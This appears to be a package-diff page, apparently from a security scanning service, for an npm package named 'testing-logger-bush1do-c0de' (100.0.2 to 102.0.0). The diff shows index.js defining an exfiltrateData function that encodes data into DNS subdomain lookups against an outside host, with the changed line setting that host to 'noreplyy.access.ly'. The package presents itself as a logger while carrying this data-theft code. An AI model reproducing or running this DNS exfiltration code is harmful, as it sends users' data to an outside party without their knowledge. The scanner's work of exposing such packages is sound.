testing-logger-bush1do-c0de 100.0.2 → 102.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
@@ -2,7 +2,7 @@ const dns = require('dns');
|
|
2
2
|
const { exec } = require('child_process');
|
3
3
|
|
4
4
|
function exfiltrateData(data) {
|
5
|
-
const subdomain = `${data}.${Buffer.from('
|
5
|
+
const subdomain = `${data}.${Buffer.from('noreplyy.access.ly').toString('base64')}`;
|
6
6
|
dns.resolve4(subdomain, (err, addresses) => {
|
7
7
|
if (err) console.error(err);
|
8
8
|
else console.log(`Data exfiltrated: ${addresses}`);
|